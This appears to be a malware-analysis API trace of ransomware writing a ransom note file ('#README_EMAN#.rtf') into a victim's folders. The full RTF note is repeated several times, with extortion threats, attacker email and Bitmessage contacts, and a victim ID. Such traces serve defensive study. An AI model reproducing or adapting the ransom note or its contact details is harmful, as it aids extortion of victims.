\\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x97\x03\x1a»oo¸«¤ÊK¨\n\x02ÈG,ÈàZÿ\x95\x99\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0285.245] WriteFile (in: hFile=0x294, lpBuffer=0x236fd38*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x236fd38*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.246] CloseHandle (hObject=0x294) returned 1 [0285.246] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\#readme_eman#.rtf")) returned 0xffffffff [0285.246] GetLastError () returned 0x2 [0285.247] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x236fd38, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only 